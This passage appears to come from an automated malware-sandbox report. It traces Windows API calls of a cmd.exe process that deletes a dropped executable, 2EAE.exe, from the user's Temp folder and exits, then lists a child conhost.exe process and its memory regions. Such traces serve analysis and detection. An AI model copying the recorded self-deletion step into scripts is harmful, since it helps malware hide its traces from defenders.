0x6ba098* [0191.527] GetProcessHeap () returned 0x6b0000 [0191.527] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb68) returned 0x6bc2a8 [0191.528] memcpy (in: _Dst=0x6bc2a8, _Src=0x6ba098, _Size=0xb68 | out: _Dst=0x6bc2a8) returned 0x6bc2a8 [0191.528] FreeEnvironmentStringsA (penv="=") returned 1 [0191.528] GetProcessHeap () returned 0x6b0000 [0191.528] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b9510) returned 1 [0191.528] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f6c8 | out: lpAttributeList=0x19f6c8) [0191.528] GetConsoleTitleW (in: lpConsoleTitle=0x19f9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0191.566] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0191.567] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0191.567] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0191.567] GetProcessHeap () returned 0x6b0000 [0191.567] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xe8) returned 0x6b0938 [0191.567] GetProcessHeap () returned 0x6b0000 [0191.567] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6b0938, Size=0x7a) returned 0x6b0938 [0191.567] GetProcessHeap () returned 0x6b0000 [0191.567] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6b0938) returned 0x7a [0191.567] GetProcessHeap () returned 0x6b0000 [0191.568] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x80) returned 0x6b09c0 [0191.568] GetProcessHeap () returned 0x6b0000 [0191.568] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xe8) returned 0x6b0a48 [0191.568] GetProcessHeap () returned 0x6b0000 [0191.568] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6b0a48, Size=0x7a) returned 0x6b0a48 [0191.568] GetProcessHeap () returned 0x6b0000 [0191.568] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6b0a48) returned 0x7a [0191.568] GetProcessHeap () returned 0x6b0000 [0191.569] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x64) returned 0x6b0ad0 [0191.569] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19f758 | out: lpBuffer="C:\\ProgramData") returned 0xe [0191.569] GetProcessHeap () returned 0x6b0000 [0191.569] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x38) returned 0x6b9540 [0191.569] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x19e7c8 | out: lpBuffer="C:\\ProgramData") returned 0xe [0191.569] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19e9fc, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x19ea00, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x19e9fc*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0191.569] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0191.569] GetProcessHeap () returned 0x6b0000 [0191.569] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x2c) returned 0x6b0b40 [0191.569] GetProcessHeap () returned 0x6b0000 [0191.569] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x258) returned 0x6b0cf8 [0191.569] _wcsicmp (_String1="2EAE.exe", _String2=".") returned 4 [0191.570] _wcsicmp (_String1="2EAE.exe", _String2="..") returned 4 [0191.570] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2eae.exe")) returned 0x20 [0191.570] GetProcessHeap () returned 0x6b0000 [0191.570] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x210) returned 0x6b8180 [0191.570] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x6b8188 | out: lpBuffer="C:\\ProgramData") returned 0xe [0191.570] SetErrorMode (uMode=0x0) returned 0x0 [0191.570] SetErrorMode (uMode=0x1) returned 0x0 [0191.570] GetFullPathNameW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe", nBufferLength=0x104, lpBuffer=0x19ee28, lpFilePart=0x19edfc | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe", lpFilePart=0x19edfc*="2EAE.exe") returned 0x2d [0191.570] SetErrorMode (uMode=0x0) returned 0x1 [0191.570] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp")) returned 0x10 [0191.570] GetProcessHeap () returned 0x6b0000 [0191.570] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x258) returned 0x6b8398 [0191.570] _wcsicmp (_String1="2EAE.exe", _String2=".") returned 4 [0191.570] _wcsicmp (_String1="2EAE.exe", _String2="..") returned 4 [0191.570] GetFileAttributesW (lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2eae.exe")) returned 0x20 [0191.571] GetProcessHeap () returned 0x6b0000 [0191.571] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x1a) returned 0x6b0f58 [0191.571] GetProcessHeap () returned 0x6b0000 [0191.571] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x52) returned 0x6b0f80 [0191.571] GetProcessHeap () returned 0x6b0000 [0191.571] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x52) returned 0x6b0fe0 [0191.571] GetProcessHeap () returned 0x6b0000 [0191.571] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x808) returned 0x6ba098 [0191.571] FindFirstFileExW (in: lpFileName="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2eae.exe"), fInfoLevelId=0x0, lpFindFileData=0x6ba0a4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x6ba0a4) returned 0x6b1040 [0191.571] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0191.571] NtOpenFile (in: FileHandle=0x19ecfc, DesiredAccess=0x10000, ObjectAttributes=0x19ecc4*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2eae.exe"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x19ecec, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x19ecfc*=0xa4, IoStatusBlock=0x19ecec*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0191.572] RtlReleaseRelativeName () returned 0x19ecdc [0191.572] RtlFreeAnsiString (AnsiString="\\") [0191.572] NtQueryVolumeInformationFile (in: FileHandle=0xa4, IoStatusBlock=0x19ec28, FsInformation=0x19ec30, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x19ec28, FsInformation=0x19ec30) returned 0x0 [0191.572] CloseHandle (hObject=0xa4) returned 1 [0191.576] FindNextFileW (in: hFindFile=0x6b1040, lpFindFileData=0x6ba0a4 | out: lpFindFileData=0x6ba0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef21bf22, ftCreationTime.dwHighDateTime=0x1d8a75e, ftLastAccessTime.dwLowDateTime=0xef21bf22, ftLastAccessTime.dwHighDateTime=0x1d8a75e, ftLastWriteTime.dwLowDateTime=0xef2d9047, ftLastWriteTime.dwHighDateTime=0x1d8a75e, nFileSizeHigh=0x0, nFileSizeLow=0x65200, dwReserved0=0x0, dwReserved1=0x0, cFileName="2EAE.exe", cAlternateFileName="")) returned 0 [0191.577] GetLastError () returned 0x12 [0191.577] FindClose (in: hFindFile=0x6b1040 | out: hFindFile=0x6b1040) returned 1 [0191.577] GetProcessHeap () returned 0x6b0000 [0191.578] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6ba098) returned 1 [0191.578] GetProcessHeap () returned 0x6b0000 [0191.578] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b0fe0) returned 1 [0191.578] GetProcessHeap () returned 0x6b0000 [0191.578] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b0f58) returned 1 [0191.578] GetProcessHeap () returned 0x6b0000 [0191.579] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b0f80) returned 1 [0191.579] GetProcessHeap () returned 0x6b0000 [0191.579] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b8398) returned 1 [0191.579] GetProcessHeap () returned 0x6b0000 [0191.579] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b8180) returned 1 [0191.579] GetProcessHeap () returned 0x6b0000 [0191.579] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b0cf8) returned 1 [0191.579] GetProcessHeap () returned 0x6b0000 [0191.579] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b0b40) returned 1 [0191.580] GetProcessHeap () returned 0x6b0000 [0191.580] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b9540) returned 1 [0191.580] GetProcessHeap () returned 0x6b0000 [0191.580] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b0ad0) returned 1 [0191.580] GetProcessHeap () returned 0x6b0000 [0191.580] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b0a48) returned 1 [0191.580] GetConsoleTitleW (in: lpConsoleTitle=0x19f9b0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0191.636] _wcsicmp (_String1="exit", _String2="DIR") returned 1 [0191.636] _wcsicmp (_String1="exit", _String2="ERASE") returned 6 [0191.636] _wcsicmp (_String1="exit", _String2="DEL") returned 1 [0191.636] _wcsicmp (_String1="exit", _String2="TYPE") returned -15 [0191.636] _wcsicmp (_String1="exit", _String2="COPY") returned 2 [0191.636] _wcsicmp (_String1="exit", _String2="CD") returned 2 [0191.636] _wcsicmp (_String1="exit", _String2="CHDIR") returned 2 [0191.636] _wcsicmp (_String1="exit", _String2="RENAME") returned -13 [0191.636] _wcsicmp (_String1="exit", _String2="REN") returned -13 [0191.636] _wcsicmp (_String1="exit", _String2="ECHO") returned 21 [0191.636] _wcsicmp (_String1="exit", _String2="SET") returned -14 [0191.636] _wcsicmp (_String1="exit", _String2="PAUSE") returned -11 [0191.636] _wcsicmp (_String1="exit", _String2="DATE") returned 1 [0191.636] _wcsicmp (_String1="exit", _String2="TIME") returned -15 [0191.636] _wcsicmp (_String1="exit", _String2="PROMPT") returned -11 [0191.636] _wcsicmp (_String1="exit", _String2="MD") returned -8 [0191.638] _wcsicmp (_String1="exit", _String2="MKDIR") returned -8 [0191.639] _wcsicmp (_String1="exit", _String2="RD") returned -13 [0191.639] _wcsicmp (_String1="exit", _String2="RMDIR") returned -13 [0191.639] _wcsicmp (_String1="exit", _String2="PATH") returned -11 [0191.639] _wcsicmp (_String1="exit", _String2="GOTO") returned -2 [0191.639] _wcsicmp (_String1="exit", _String2="SHIFT") returned -14 [0191.639] _wcsicmp (_String1="exit", _String2="CLS") returned 2 [0191.639] _wcsicmp (_String1="exit", _String2="CALL") returned 2 [0191.639] _wcsicmp (_String1="exit", _String2="VERIFY") returned -17 [0191.639] _wcsicmp (_String1="exit", _String2="VER") returned -17 [0191.639] _wcsicmp (_String1="exit", _String2="VOL") returned -17 [0191.639] _wcsicmp (_String1="exit", _String2="EXIT") returned 0 [0191.639] GetProcessHeap () returned 0x6b0000 [0191.639] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xc) returned 0x6b9510 [0191.639] GetProcessHeap () returned 0x6b0000 [0191.639] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x12) returned 0x6b7910 [0191.639] exit (_Code=0) Thread: id = 176 os_tid = 0xcd0 Process: id = "11" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x6da1e000" os_pid = "0xd28" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "10" os_parent_pid = "0xd30" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3174 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3175 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3176 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 3177 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3178 start_va = 0x400000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 3179 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3180 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 3181 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 3182 start_va = 0x7ff637930000 end_va = 0x7ff637940fff monitored = 0 entry_point = 0x7ff6379316b0 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 3183 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3184 start_va = 0x90000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 3185 start_va = 0x7ffa15160000 end_va = 0x7ffa1520cfff monitored = 0 entry_point = 0x7ffa151781a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3186 start_va = 0x7ffa13130000 end_va = 0x7ffa13317fff monitored = 0 entry_point = 0x7ffa1315ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3187 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3188 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 3189 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3190 start_va = 0x7ffa13cc0000 end_va = 0x7ffa13d5cfff monitored = 0 entry_point = 0x7ffa13cc78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3191 start_va = 0x1a0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3192 start_va = 0x6c0000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 3197 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3198 start_va = 0x7ffa0abf0000 end_va = 0x7ffa0ac48fff monitored = 0 entry_point = 0x7ffa0abffbf0 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 3199 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 3200 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3201 start_va = 0x7ffa14340000 end_va = 0x7ffa145bcfff monitored = 0 entry_point = 0x7ffa14414970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 3202 start_va = 0x7ffa145c0000 end_va = 0x7ffa146dbfff monitored = 0 entry_point = 0x7ffa146002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3203 start_va = 0x7ffa13320000 end_va = 0x7ffa13389fff monitored = 0 entry_point = 0x7ffa13356d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 3204 start_va = 0x7ffa13d80000 end_va = 0x7ffa13ed5fff monitored = 0 entry_point = 0x7ffa13d8a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3205 start_va = 0x7ffa13ee0000 end_va = 0x7ffa14065fff monitored = 0 entry_point = 0x7ffa13f2ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3206 start_va = 0x1e0000 end_va = 0x1e6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 3207 start_va = 0x7ffa13b70000 end_va = 0x7ffa13cb2fff monitored = 0 entry_point = 0x7ffa13b98210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3208 start_va = 0x7ffa14070000 end_va = 0x7ffa140cafff monitored = 0 entry_point = 0x7ffa140838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3209 start_va = 0x7ffa141e0000 end_va = 0x7ffa1421afff monitored = 0 entry_point = 0x7ffa141e12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3210 start_va = 0x7ffa147c0000 end_va = 0x7ffa14880fff monitored = 0 entry_point = 0x7ffa147e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3211 start_va = 0x7ffa11220000 end_va = 0x7ffa113a5fff monitored = 0 entry_point = 0x7ffa1126d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 3212 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 3213 start_va = 0x6c0000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 3214 start_va = 0x700000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000700000" filename = "" Region: id = 3215 start_va = 0x710000 end_va = 0x897fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000710000" filename = "" Region: id = 3216 start_va = 0x8a0000 end_va = 0xa20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008a0000" filename = "" Region: id = 3217 start_va = 0xa30000 end_va = 0x1e2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a30000" filename = "" Region: id = 3218 start_va = 0x1e30000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 3223 start_va = 0x1e30000 end_va = 0x1e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e30000" filename = "" Region: id = 3224 start_va = 0x1f50000 end_va = 0x1f5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f50000" filename = "" Region: id = 3225 start_va = 0x7ffa15210000 end_va = 0x7ffa1676efff monitored = 0 entry_point = 0x7ffa153711f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3226 start_va = 0x7ffa13390000 end_va = 0x7ffa133d2fff monitored = 0 entry_point = 0x7ffa133a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3227 start_va = 0x7ffa13520000 end_va = 0x7ffa13b63fff monitored = 0 entry_point = 0x7ffa136e64b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 3228 start_va = 0x7ffa15090000 end_va = 0x7ffa15136fff monitored = 0 entry_point = 0x7ffa150a58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3229 start_va = 0x7ffa14ba0000 end_va = 0x7ffa14bf1fff monitored = 0 entry_point = 0x7ffa14baf530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3230 start_va = 0x7ffa12e10000 end_va = 0x7ffa12e1efff monitored = 0 entry_point = 0x7ffa12e13210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 3231 start_va = 0x7ffa12e80000 end_va = 0x7ffa12f34fff monitored = 0 entry_point = 0x7ffa12ec22e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 3232 start_va = 0x7ffa12dc0000 end_va = 0x7ffa12e0afff monitored = 0 entry_point = 0x7ffa12dc35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3233 start_va = 0x7ffa12d90000 end_va = 0x7ffa12da3fff monitored = 0 entry_point = 0x7ffa12d952e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3234 start_va = 0x7ffa11710000 end_va = 0x7ffa117a5fff monitored = 0 entry_point = 0x7ffa11735570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 3235 start_va = 0x1f60000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 3241 start_va = 0x20d0000 end_va = 0x2406fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3242 start_va = 0x50000 end_va = 0x70fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\System32\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\cmd.exe.mui") Region: id = 3243 start_va = 0x1e70000 end_va = 0x1ec9fff monitored = 1 entry_point = 0x1e853f0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 3245 start_va = 0x2410000 end_va = 0x262ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002410000" filename = "" Region: id = 3246 start_va = 0x2630000 end_va = 0x2840fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 3247 start_va = 0x1f60000 end_va = 0x206afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 3248 start_va = 0x20c0000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 3249 start_va = 0x2850000 end_va = 0x2a66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002850000" filename = "" Region: id = 3256 start_va = 0x2a70000 end_va = 0x2b7afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 3257 start_va = 0x1e70000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e70000" filename = "" Region: id = 3258 start_va = 0x7ffa14a40000 end_va = 0x7ffa14b99fff monitored = 0 entry_point = 0x7ffa14a838e0 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3259 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3260 start_va = 0x2b80000 end_va = 0x2c3bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b80000" filename = "" Region: id = 3261 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 3262 start_va = 0x7ffa10610000 end_va = 0x7ffa10631fff monitored = 0 entry_point = 0x7ffa10611a40 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\System32\\dwmapi.dll" (normalized: "c:\\windows\\system32\\dwmapi.dll") Region: id = 3263 start_va = 0x7ffa11410000 end_va = 0x7ffa11422fff monitored = 0 entry_point = 0x7ffa11412760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 3264 start_va = 0x7ffa12ba0000 end_va = 0x7ffa12bf5fff monitored = 0 entry_point = 0x7ffa12bb0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 3265 start_va = 0x60000 end_va = 0x66fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3266 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 3267 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000080000" filename = "" Region: id = 3268 start_va = 0x6d0000 end_va = 0x6d4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 3269 start_va = 0x6e0000 end_va = 0x6e0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "conhostv2.dll.mui" filename = "\\Windows\\System32\\en-US\\ConhostV2.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\conhostv2.dll.mui") Region: id = 3272 start_va = 0x6f0000 end_va = 0x6f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = 